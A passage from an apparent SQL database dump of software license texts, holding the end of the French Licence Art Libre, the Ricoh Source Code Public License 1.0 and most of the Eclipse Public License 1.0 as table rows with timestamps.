favoriser.\n\nL\'intention est d\'ouvrir l\'accès et d\'autoriser l\'utilisation des ressources\nd\'une oeuvre par le plus grand nombre. En avoir jouissance pour en multiplier\nles réjouissances, créer de nouvelles conditions de création pour amplifier\nles possibilités de création. Dans le respect des auteurs avec la reconnaissance\net la défense de leur droit moral.\n\nEn effet, avec la venue du numérique, l\'invention de l\'internet et des logiciels\nlibres, un nouveau mode de création et de production est apparu. Il est aussi\nl\'amplification de ce qui a été expérimenté par nombre d\'artistes contemporains.\n\nLe savoir et la création sont des ressources qui doivent demeurer libres pour\nêtre encore véritablement du savoir et de la création. C\'est à dire rester\nune recherche fondamentale qui ne soit pas directement liée à une application\nconcrète. Créer c\'est découvrir l\'inconnu, c\'est inventer le réel avant tout\nsouci de réalisme.\n\nAinsi, l\'objet de l\'art n\'est pas confondu avec l\'objet d\'art fini et défini\ncomme tel.\n\nC\'est la raison essentielle de cette Licence Art Libre : promouvoir et protéger\ndes pratiques artistiques libérées des seules règles de l\'économie de marché.\n\nDÉFINITIONS\n\n– L\'oeuvre :\n\nil s\'agit d\'une oeuvre commune qui comprend l\'oeuvre originelle ainsi que\ntoutes les contributions postérieures (les originaux conséquents et les copies).\nElle est créée à l\'initiative de l\'auteur originel qui par cette licence définit\nles conditions selon lesquelles les contributions sont faites.\n\n– L\'oeuvre originelle :\n\nc\'est-à-dire l\'oeuvre créée par l\'initiateur de l\'oeuvre commune dont les\ncopies vont être modifiées par qui le souhaite.\n\n– Les oeuvres conséquentes :\n\nc\'est-à-dire les propositions des auteurs qui contribuent à la formation de\nl\'oeuvre en faisant usage des droits de reproduction, de diffusion et de modification\nque leur confère la licence.\n\n– Original (source ou ressource de l\'oeuvre) :\n\nexemplaire daté de l\'oeuvre, de sa définition, de sa partition ou de son programme\nque l\'auteur présente comme référence pour toutes actualisations, interprétations,\ncopies ou reproductions ultérieures.\n\n– Copie :\n\ntoute reproduction d\'un original au sens de cette licence.\n\n– Auteur de l\'oeuvre originelle :\n\nc\'est la personne qui a créé l\'oeuvre à l\'origine d\'une arborescence de cette\noeuvre modifiée. Par cette licence, l\'auteur détermine les conditions dans\nlesquelles ce travail se fait.\n\n– Contributeur :\n\ntoute personne qui contribue à la création de l\'oeuvre. Il est l\'auteur d\'une\noeuvre originale résultant de la modification d\'une copie de l\'oeuvre originelle\nou de la modification d\'une copie d\'une oeuvre conséquente.\n\n 1. OBJET\n\nCette licence a pour objet de définir les conditions selon lesquelles vous\npouvez jouir librement de cette oeuvre.\n\n 2. L\'ÉTENDUE DE LA JOUISSANCE\n\nCette oeuvre est soumise au droit d\'auteur, et l\'auteur par cette licence\nvous indique quelles sont vos libertés pour la copier, la diffuser et la modifier:\n\n 2.1 LA LIBERTÉ DE COPIER (OU DE REPRODUCTION)\n\nVous avez la liberté de copier cette oeuvre pour un usage personnel, pour\nvos amis, ou toute autre personne et quelque soit la technique employée.\n\n 2.2 LA LIBERTÉ DE DIFFUSER, D\'INTERPRÉTER (OU DE REPRÉSENTATION)\n\nVous pouvez diffuser librement les copies de ces oeuvres, modifiées ou non,\nquel que soit le support, quel que soit le lieu, à titre onéreux ou gratuit\nsi vous respectez toutes les conditions suivantes:\n\n– joindre aux copies, cette licence à l\'identique, ou indiquer précisément\noù se trouve la licence,\n\n – indiquer au destinataire le nom de l\'auteur des originaux,\n\n – indiquer au destinataire où il pourra avoir accès aux originaux\n\n(originels et/ou conséquents). L\'auteur de l\'original pourra, s\'il le souhaite,\nvous autoriser à diffuser l\'original dans les mêmes conditions que les copies.\n\n 2.3 LA LIBERTÉ DE MODIFIER\n\nVous avez la liberté de modifier les copies des originaux (originels et conséquents),\nqui peuvent être partielles ou non, dans le respect des conditions prévues\nà l\'article 2.2 en cas de diffusion (ou représentation) de la copie modifiée.\nL\'auteur de l\'original pourra, s\'il le souhaite, vous autoriser à modifier\nl\'original dans les mêmes conditions que les copies.\n\n 3. L\'INCORPORATION DE L\'OEUVRE\n\nTous les éléments de cette oeuvre doivent demeurer libres, c\'est pourquoi\nil ne vous est pas permis d\'intégrer les originaux (originels et conséquents)\ndans une autre oeuvre qui ne serait pas soumise à cette licence.\n\n 4. VOS DROITS D\'AUTEUR\n\nCette licence n\'a pas pour objet de nier vos droits d\'auteur sur votre contribution.\nEn choisissant de contribuer à l\'évolution de cette oeuvre, vous acceptez\nseulement d\'offrir aux autres les mêmes droits sur votre contribution que\nceux qui vous ont été accordés par cette licence.\n\n 5. LA DURÉE DE LA LICENCE\n\nCette licence prend effet dès votre acceptation de ses dispositions. Le fait\nde copier, de diffuser, ou de modifier l\'oeuvre constitue une acception tacite.\n\n Cette licence a pour durée la durée des droits d\'auteur attachés à l\'oeuvre.\n\nSi vous ne respectez pas les termes de cette licence, vous perdez automatiquement\nles droits qu\'elle vous confère.\n\nSi le régime juridique auquel vous êtes soumis ne vous permet pas de respecter\nles termes de cette licence, vous ne pouvez pas vous prévaloir des libertés\nqu\'elle confère.\n\n 6. LES DIFFÉRENTES VERSIONS DE LA LICENCE\n\nCette licence pourra être modifiée régulièrement, en vue de son amélioration,\npar ses auteurs (les acteurs du mouvement « copyleft attitude ») sous la forme\nde nouvelles versions numérotées.\n\nVous avez toujours le choix entre vous contenter des dispositions contenues\ndans la version sous laquelle la copie vous a été communiquée ou alors, vous\nprévaloir des dispositions d\'une des versions ultérieures.\n\n 7. LES SOUS-LICENCES\n\nLes sous licences ne sont pas autorisées par la présente. Toute personne qui\nsouhaite bénéficier des libertés qu\'elle confère sera liée directement à l\'auteur\nde l\'oeuvre originelle.\n\n 8. LA LOI APPLICABLE AU CONTRAT\n\nCette licence est soumise au droit français.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(332,'RSCPL','Ricoh Source Code Public License\n\nVersion 1.0\n\n 1. Definitions.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Electronic Distribution Mechanism\" means a website or any other mechanism\ngenerally accepted in the software development community for the electronic\ntransfer of data.\n\n1.4. \"Executable Code\" means Governed Code in any form other than Source Code.\n\n1.5. \"Governed Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.6. \"Larger Work\" means a work which combines Governed Code or portions thereof\nwith code not governed by the terms of this License.\n\n1.7. \"Licensable\" means the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently acquired, any and\nall of the rights conveyed herein.\n\n 1.8. \"License\" means this document.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nGoverned Code is released as a series of files, a Modification is:\n\n(a) Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\n(b) Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\" means the \"Platform for Information Applications\" Source\nCode as released under this License by RSV.\n\n1.11 \"Patent Claims\" means any patent claim(s), now owned or hereafter acquired,\nincluding without limitation, method, process, and apparatus claims, in any\npatent Licensable by the grantor of a license thereto.\n\n1.12. \"RSV\" means Ricoh Silicon Valley, Inc., a California corporation with\noffices at 2882 Sand Hill Road, Suite 115, Menlo Park, CA 94025-7022.\n\n1.13. \"Source Code\" means the preferred form of the Governed Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof Executable Code, or a list of source code differential comparisons against\neither the Original Code or another well known, available Governed Code of\nthe Contributor\'s choice. The Source Code can be in a compressed or archival\nform, provided the appropriate decompression or de-archiving software is widely\navailable for no charge.\n\n1.14. \"You\" means an individual or a legal entity exercising rights under,\nand complying with all of the terms of, this License or a future version of\nthis License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of fifty percent (50%) or more\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n2.1. Grant from RSV. RSV hereby grants You a worldwide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims:\n\n(a) to use, reproduce, modify, create derivative works of, display, perform,\nsublicense and distribute the Original Code (or portions thereof) with or\nwithout Modifications, or as part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\n2.2. Contributor Grant. Each Contributor hereby grants You a worldwide, royalty-free,\nnon-exclusive license, subject to third party intellectual property claims:\n\n(a) to use, reproduce, modify, create derivative works of, display, perform,\nsublicense and distribute the Modifications created by such Contributor (or\nportions thereof) either on an unmodified basis, with other Modifications,\nas Governed Code or as part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: (i) Modifications made by that Contributor\n(or portions thereof); and (ii) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n 3. Distribution Obligations.\n\n3.1. Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Governed Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available in Source Code form under the\nterms of this License either on the same media as an Executable Code version\nor via an Electronic Distribution Mechanism to anyone to whom you made an\nExecutable Code version available; and if made available via an Electronic\nDistribution Mechanism, must remain available for at least twelve (12) months\nafter the date it initially became available, or at least six (6) months after\na subsequent version of that particular Modification has been made available\nto such recipients. You are responsible for ensuring that the Source Code\nversion remains available even if the Electronic Distribution Mechanism is\nmaintained by a third party.\n\n3.3. Description of Modifications. You must cause all Governed Code to which\nyou contribute to contain a file documenting the changes You made to create\nthat Governed Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by RSV and including the name of RSV in (a) the Source Code,\nand (b) in any notice in an Executable Code version or related documentation\nin which You describe the origin or ownership of the Governed Code.\n\n 3.4. Intellectual Property Matters.\n\n3.4.1. Third Party Claims. If You have knowledge that a party claims an intellectual\nproperty right in particular functionality or code (or its utilization under\nthis License), you must include a text file with the source code distribution\ntitled \"LEGAL\" which describes the claim and the party making the claim in\nsufficient detail that a recipient will know whom to contact. If you obtain\nsuch knowledge after You make Your Modification available as described in\nSection 3.2, You shall promptly modify the LEGAL file in all copies You make\navailable thereafter and shall take other steps (such as notifying RSV and\nappropriate mailing lists or newsgroups) reasonably calculated to inform those\nwho received the Governed Code that new knowledge has been obtained. In the\nevent that You are a Contributor, You represent that, except as disclosed\nin the LEGAL file, your Modifications are your original creations and, to\nthe best of your knowledge, no third party has any claim (including but not\nlimited to intellectual property claims) relating to your Modifications. You\nrepresent that the LEGAL file includes complete details of any license or\nother restriction associated with any part of your Modifications.\n\n3.4.2. Contributor APIs. If Your Modification is an application programming\ninterface and You own or control patents which are reasonably necessary to\nimplement that API, you must also include this information in the LEGAL file.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code, and this License in any documentation for the Source\nCode, where You describe recipients\' rights relating to Governed Code. If\nYou created one or more Modification(s), You may add your name as a Contributor\nto the notice described in Exhibit A. If it is not possible to put such notice\nin a particular Source Code file due to its structure, then you must include\nsuch notice in a location (such as a relevant directory file) where a user\nwould be likely to look for such a notice. You may choose to offer, and to\ncharge a fee for, warranty, support, indemnity or liability obligations to\none or more recipients of Governed Code. However, You may do so only on Your\nown behalf, and not on behalf of RSV or any Contributor. You must make it\nabsolutely clear than any such warranty, support, indemnity or liability obligation\nis offered by You alone, and You hereby agree to indemnify RSV and every Contributor\nfor any liability incurred by RSV or such Contributor as a result of warranty,\nsupport, indemnity or liability terms You offer.\n\n3.6. Distribution of Executable Code Versions. You may distribute Governed\nCode in Executable Code form only if the requirements of Section 3.1-3.5 have\nbeen met for that Governed Code, and if You include a prominent notice stating\nthat the Source Code version of the Governed Code is available under the terms\nof this License, including a description of how and where You have fulfilled\nthe obligations of Section 3.2. The notice must be conspicuously included\nin any notice in an Executable Code version, related documentation or collateral\nin which You describe recipients\' rights relating to the Governed Code. You\nmay distribute the Executable Code version of Governed Code under a license\nof Your choice, which may contain terms different from this License, provided\nthat You are in compliance with the terms of this License and that the license\nfor the Executable Code version does not attempt to limit or alter the recipient\'s\nrights in the Source Code version from the rights set forth in this License.\nIf You distribute the Executable Code version under a different license You\nmust make it absolutely clear that any terms which differ from this License\nare offered by You alone, not by RSV or any Contributor. You hereby agree\nto indemnify RSV and every Contributor for any liability incurred by RSV or\nsuch Contributor as a result of any such terms You offer.\n\n3.7. Larger Works. You may create a Larger Work by combining Governed Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Governed Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of theterms of this License\nwith respect to some or all of the Governed Code due to statute or regulation\nthen You must: (a) comply with the terms of this License to the maximum extent\npossible; and (b) describe the limitations and the code they affect. Such\ndescription must be included in the LEGAL file described in Section 3.4 and\nmust be included with all distributions of the Source Code. Except to the\nextent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill to be able to understand it.\n\n 5. Trademark Usage.\n\n5.1. Advertising Materials. All advertising materials mentioning features\nor use of the Governed Code must display the following acknowledgement: \"This\nproduct includes software developed by Ricoh Silicon Valley, Inc.\"\n\n5.2. Endorsements. The names \"Ricoh,\" \"Ricoh Silicon Valley,\" and \"RSV\" must\nnot be used to endorse or promote Contributor Versions or Larger Works without\nthe prior written permission of RSV.\n\n5.3. Product Names. Contributor Versions and Larger Works may not be called\n\"Ricoh\" nor may the word \"Ricoh\" appear in their names without the prior written\npermission of RSV.\n\n 6. Versions of the License.\n\n6.1. New Versions. RSV may publish revised and/or new versions of the License\nfrom time to time. Each version will be given a distinguishing version number.\n\n6.2. Effect of New Versions. Once Governed Code has been published under a\nparticular version of the License, You may always continue to use it under\nthe terms of that version. You may also choose to use such Governed Code under\nthe terms of any subsequent version of the License published by RSV. No one\nother than RSV has the right to modify the terms applicable to Governed Code\ncreated under this License.\n\n 7. Disclaimer of Warranty.\n\nGOVERNED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE GOVERNED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR\nA PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE GOVERNED CODE IS WITH YOU. SHOULD ANY GOVERNED CODE\nPROVE DEFECTIVE IN ANY RESPECT, YOU (NOT RSV OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY GOVERNED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. Termination.\n\n8.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Governed Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2. If You initiate patent infringement litigation against RSV or a Contributor\n(RSV or the Contributor against whom You file such action is referred to as\n\"Participant\") alleging that:\n\n(a) such Participant\'s Original Code or Contributor Version directly or indirectly\ninfringes any patent, then any and all rights granted by such Participant\nto You under Sections 2.1 and/or 2.2 of this License shall, upon 60 days notice\nfrom Participant terminate prospectively, unless if within 60 days after receipt\nof notice You either: (i) agree in writing to pay Participant a mutually agreeable\nreasonable royalty for Your past and future use of the Original Code or the\nModifications made by such Participant, or (ii) withdraw Your litigation claim\nwith respect to the Original Code or the Contributor Version against such\nParticipant. If within 60 days of notice, a reasonable royalty and payment\narrangement are not mutually agreed upon in writing by the parties or the\nlitigation claim is not withdrawn, the rights granted by Participant to You\nunder Sections 2.1 and/or 2.2 automatically terminate at the expiration of\nthe 60 day notice period specified above.\n\n(b) any software, hardware, or device provided to You by the Participant,\nother than such Participant\'s Original Code or Contributor Version, directly\nor indirectly infringes any patent, then any rights granted to You by such\nParticipant under Sections 2.1(b) and 2.2(b) are revoked effective as of the\ndate You first made, used, sold, distributed, or had made, Original Code or\nthe Modifications made by that Participant.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Original Code or Contributor Version directly or indirectly\ninfringes any patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9. Limitation of Liability.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL RSV, ANY CONTRIBUTOR, OR ANY DISTRIBUTOR\nOF GOVERNED CODE, OR ANY SUPPLIER OF ANY OF SUCH PARTIES, BE LIABLE TO YOU\nOR ANY OTHER PERSON FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL\nDAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF\nGOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER\nCOMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE BEEN INFORMED\nOF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY SHALL NOT\nAPPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH PARTY\'S\nNEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. SOME JURISDICTIONS\nDO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES,\nSO THAT EXCLUSION AND LIMITATION MAY NOT APPLY TO YOU. TO THE EXTENT THAT\nANY EXCLUSION OF DAMAGES ABOVE IS NOT VALID, YOU AGREE THAT IN NO EVENT WILL\nRSV \' S LIABILITY UNDER OR RELATED TO THIS AGREEMENT EXCEED FIVE THOUSAND\nDOLLARS ($5,000). THE GOVERNED CODE IS NOT INTENDED FOR USE IN CONNECTION\nWITH ANY NUCLER, AVIATION, MASS TRANSIT OR MEDICAL APPLICATION OR ANY OTHER\nINHERENTLY DANGEROUS APPLICATION THAT COULD RESULT IN DEATH, PERSONAL INJURY,\nCATASTROPHIC DAMAGE OR MASS DESTRUCTION, AND YOU AGREE THAT NEITHER RSV NOR\nANY CONTRIBUTOR SHALL HAVE ANY LIABILITY OF ANY NATURE AS A RESULT OF ANY\nSUCH USE OF THE GOVERNED CODE.\n\n 10. U.S. Government End Users.\n\nThe Governed Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Governed Code\nwith only those rights set forth herein.\n\n 11. Miscellaneous.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. The parties submit to personal jurisdiction in California and\nfurther agree that any cause of action arising under or related to this Agreement\nshall be brought in the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California. The losing party shall\nbe responsible for costs, including without limitation, court costs and reasonable\nattorney \' s fees and expenses. Notwithstanding anything to the contrary herein,\nRSV may seek injunctive relief related to a breach of this Agreement in any\ncourt of competent jurisdiction. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. Responsibility for Claims.\n\nExcept in cases where another Contributor has failed to comply with Section\n3.4, You are responsible for damages arising, directly or indirectly, out\nof Your utilization of rights under this License, based on the number of copies\nof Governed Code you made available, the revenues you received from utilizing\nsuch rights, and other relevant factors. You agree to work with affected parties\nto distribute responsibility on an equitable basis. EXHIBIT A\n\n\"The contents of this file are subject to the Ricoh Source Code Public License\nVersion 1.0 (the \"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at http://www.risource.org/RPL\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThis code was initially developed by Ricoh Silicon Valley, Inc. Portions created\nby Ricoh Silicon Valley, Inc. are Copyright (C) 1995-1999. All Rights Reserved.\n\nContributor(s): ______________________________________.\"\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(333,'EPL-1.0','Eclipse Public License - v 1.0\n\nTHE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE PUBLIC\nLICENSE (\"AGREEMENT\"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM\nCONSTITUTES RECIPIENT\'S ACCEPTANCE OF THIS AGREEMENT.\n\n 1. DEFINITIONS\n\n \"Contribution\" means:\n\na) in the case of the initial Contributor, the initial code and documentation\ndistributed under this Agreement, and\n\n b) in the case of each subsequent Contributor:\n\n i) changes to the Program, and\n\n ii) additions to the Program;\n\nwhere such changes and/or additions to the Program originate from and are\ndistributed by that particular Contributor. A Contribution \'originates\' from\na Contributor if it was added to the Program by such Contributor itself or\nanyone acting on such Contributor\'s behalf. Contributions do not include additions\nto the Program which: (i) are separate modules of software distributed in\nconjunction with the Program under their own license agreement, and (ii) are\nnot derivative works of the Program.\n\n \"Contributor\" means any person or entity that distributes the Program.\n\n\"Licensed Patents\" mean patent claims licensable by a Contributor which are\nnecessarily infringed by the use or sale of its Contribution alone or when\ncombined with the Program.\n\n\"Program\" means the Contributions distributed in accordance with this Agreement.\n\n\"Recipient\" means anyone who receives the Program under this Agreement, including\nall Contributors.\n\n 2. GRANT OF RIGHTS\n\na) Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free copyright license to reproduce,\nprepare derivative works of, publicly display, publicly perform, distribute\nand sublicense the Contribution of such Contributor, if any, and such derivative\nworks, in source code and object code form.\n\nb) Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free patent license under Licensed\nPatents to make, use, sell, offer to sell, import and otherwise transfer the\nContribution of such Contributor, if any, in source code and object code form.\nThis patent license shall apply to the combination of the Contribution and\nthe Program if, at the time the Contribution is added by the Contributor,\nsuch addition of the Contribution causes such combination to be covered by\nthe Licensed Patents. The patent license shall not apply to any other combinations\nwhich include the Contribution. No hardware per se is licensed hereunder.\n\nc) Recipient understands that although each Contributor grants the licenses\nto its Contributions set forth herein, no assurances are provided by any Contributor\nthat the Program does not infringe the patent or other intellectual property\nrights of any other entity. Each Contributor disclaims any liability to Recipient\nfor claims brought by any other entity based on infringement of intellectual\nproperty rights or otherwise. As a condition to exercising the rights and\nlicenses granted hereunder, each Recipient hereby assumes sole responsibility\nto secure any other intellectual property rights needed, if any. For example,\nif a third party patent license is required to allow Recipient to distribute\nthe Program, it is Recipient\'s responsibility to acquire that license before\ndistributing the Program.\n\nd) Each Contributor represents that to its knowledge it has sufficient copyright\nrights in its Contribution, if any, to grant the copyright license set forth\nin this Agreement.\n\n 3. REQUIREMENTS\n\nA Contributor may choose to distribute the Program in object code form under\nits own license agreement, provided that:\n\n a) it complies with the terms and conditions of this Agreement; and\n\n b) its license agreement:\n\ni) effectively disclaims on behalf of all Contributors all warranties and\nconditions, express and implied, including warranties or conditions of title\nand non-infringement, and implied warranties or conditions of merchantability\nand fitness for a particular purpose;\n\nii) effectively excludes on behalf of all Contributors all liability for damages,\nincluding direct, indirect, special, incidental and consequential damages,\nsuch as lost profits;\n\niii) states that any provisions which differ from this Agreement are offered\nby that Contributor alone and not by any other party; and\n\niv) states that source code for the Program is available from such Contributor,\nand informs licensees how to obtain it in a reasonable manner on or through\na medium customarily used for software exchange.\n\n When the Program is made available in source code form:\n\n a) it must be made available under this Agreement; and\n\nb) a copy of this Agreement must be included with each copy of the Program.\n\nContributors may not remove or alter any copyright notices contained within\nthe Program.\n\nEach Contributor must identify itself as the originator of its Contribution,\nif any, in a manner that reasonably allows subsequent Recipients to identify\nthe originator of the Contribution.\n\n 4. COMMERCIAL DISTRIBUTION\n\nCommercial distributors of software may accept certain responsibilities with\nrespect to end users, business partners and the like. While this license is\nintended to facilitate the commercial use of the Program, the Contributor\nwho includes the Program in a commercial product offering should do so in\na manner which does not create potential liability for other Contributors.\nTherefore, if a Contributor includes the Program in a commercial product offering,\nsuch Contributor (\"Commercial Contributor\") hereby agrees to defend and indemnify\nevery other Contributor (\"Indemnified Contributor\") against any losses, damages\nand costs (collectively \"Losses\") arising from claims, lawsuits and other\nlegal actions brought by a third party against the Indemnified Contributor\nto the extent caused by the acts or omissions of such Commercial Contributor\nin connection with its distribution of the Program in a commercial product\noffering. The obligations in this section do not apply to any claims or Losses\nrelating to any actual or alleged intellectual property infringement. In order\nto qualify, an Indemnified Contributor must: a) promptly notify the Commercial\nContributor in writing of such claim, and b) allow the Commercial Contributor\nto control, and cooperate with the Commercial Contributor in, the defense\nand any related settlement negotiations. The Indemnified Contributor may participate\nin any such claim at its own expense.\n\nFor example, a Contributor might include the Program in a commercial product\noffering, Product X. That Contributor is then a Commercial Contributor. If\nthat Commercial Contributor then makes performance claims, or offers warranties\nrelated to Product X, those performance claims and warranties are such Commercial\nContributor\'s responsibility alone. Under this section, the Commercial Contributor\nwould have to defend claims against the other Contributors related to those\nperformance claims and warranties, and if a court requires any other Contributor\nto pay any damages as a result, the Commercial Contributor must pay those\ndamages.\n\n 5. NO WARRANTY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON\nAN \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS\nOR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF\nTITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\nEach Recipient is solely responsible for determining the appropriateness of\nusing and distributing the Program and assumes all risks associated with its\nexercise of rights under this Agreement, including but not limited to the\nrisks and costs of program errors, compliance with applicable laws, damage\nto or loss of data, programs or equipment, and unavailability or interruption\nof operations.\n\n 6. DISCLAIMER OF LIABILITY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY\nCONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION\nLOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\nSTRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\nWAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS\nGRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. GENERAL\n\nIf any provision of this Agreement is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this Agreement, and without further action by the parties hereto,\nsuch provision shall be reformed to the minimum extent necessary to make such\nprovision valid and enforceable.\n\nIf Recipient institutes patent litigation against any entity (including a\ncross-claim or counterclaim in a lawsuit) alleging that the Program itself\n(excluding combinations of the Program with other software or hardware) infringes\nsuch Recipient\'s patent(s), then such Recipient\'s rights granted under Section\n2(b) shall terminate as of the date such litigation is filed.\n\nAll Recipient\'s rights under this Agreement shall terminate if it fails to\ncomply with any of the material terms or conditions of this Agreement and\ndoes not cure such failure in a reasonable period of time after becoming aware\nof such noncompliance. If all Recipient\'s rights under this Agreement terminate,\nRecipient agrees to cease use and distribution of the Program as soon as reasonably\npracticable. However, Recipient\'s obligations under this Agreement and any\nlicenses granted by Recipient relating to the Program shall continue and survive.\n\nEveryone is permitted to copy and distribute copies of this Agreement, but\nin order to avoid inconsistency the Agreement is copyrighted and may only\nbe modified in the following manner. The Agreement Steward reserves the right\nto publish new versions (including revisions) of this Agreement from time\nto time. No one other than the Agreement Steward has the right to modify this\nAgreement. The Eclipse Foundation is the initial Agreement Steward. The Eclipse\nFoundation may assign the responsibility to serve as the Agreement Steward\nto a suitable separate entity. Each new version of the Agreement will be given\na distinguishing version number. The Program (including Contributions) may\nalways be distributed subject to the version of the Agreement under which\nit was received. 